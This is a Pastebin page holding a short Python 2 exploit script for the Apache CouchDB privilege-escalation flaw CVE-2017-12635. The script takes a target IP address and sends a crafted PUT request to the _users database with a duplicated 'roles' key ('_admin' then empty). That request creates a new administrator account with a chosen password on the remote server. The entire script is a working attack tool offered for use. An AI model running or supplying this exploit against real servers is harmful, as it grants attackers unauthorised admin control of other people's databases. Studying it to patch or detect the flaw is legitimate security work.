API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jul 2nd, 2018
221
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.13 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2.  
  3. '''
  4. @author: r4wd3r
  5. @license: MIT License
  6. @contact: r4wd3r@gmail.com
  7. '''
  8.  
  9. import argparse
  10. import re
  11. import sys
  12. import requests
  13.  
  14. parser = argparse.ArgumentParser(
  15. description='Exploits the Apache CouchDB JSON Remote Privilege Escalation Vulnerability' +
  16. ' (CVE-2017-12635)')
  17. parser.add_argument('host', help='Host to attack.', type=str)
  18. parser.add_argument('-p', '--port', help='Port of CouchDB Service', type=str, default='5984')
  19. parser.add_argument('-u', '--user', help='Username to create as admin.',
  20. type=str, default='couchara')
  21. parser.add_argument('-P', '--password', help='Password of the created user.',
  22. type=str, default='couchapass')
  23. args = parser.parse_args()
  24.  
  25. host = args.host
  26. port = args.port
  27. user = args.user
  28. password = args.password
  29.  
  30. pat_ip = re.compile("^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$")
  31. if not pat_ip.match(host):
  32. print "[x] Wrong host. Must be a valid IP address."
  33. sys.exit(1)
  34.  
  35. print "[+] User to create: " + user
  36. print "[+] Password: " + password
  37. print "[+] Attacking host " + host + " on port " + port
  38.  
  39. url = 'http://' + host + ':' + port
  40.  
  41. try:
  42. rtest = requests.get(url, timeout=10)
  43. except requests.exceptions.Timeout:
  44. print "[x] Server is taking too long to answer. Exiting."
  45. sys.exit(1)
  46. except requests.ConnectionError:
  47. print "[x] Unable to connect to the remote host."
  48. sys.exit(1)
  49.  
  50. # Payload for creating user
  51. cu_url_payload = url + "/_users/org.couchdb.user:" + user
  52. cu_data_payload = '{"type": "user", "name": "'+user+'", "roles": ["_admin"], "roles": [], "password": "'+password+'"}'
  53.  
  54. try:
  55. rcu = requests.put(cu_url_payload, data=cu_data_payload)
  56. except requests.exceptions.HTTPError:
  57. print "[x] ERROR: Unable to create the user on remote host."
  58. sys.exit(1)
  59.  
  60. if rcu.status_code == 201:
  61. print "[+] User " + user + " with password " + password + " successfully created."
  62. sys.exit(0)
  63. else:
  64. print "[x] ERROR " + str(rcu.status_code) + ": Unable to create the user on remote host."
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!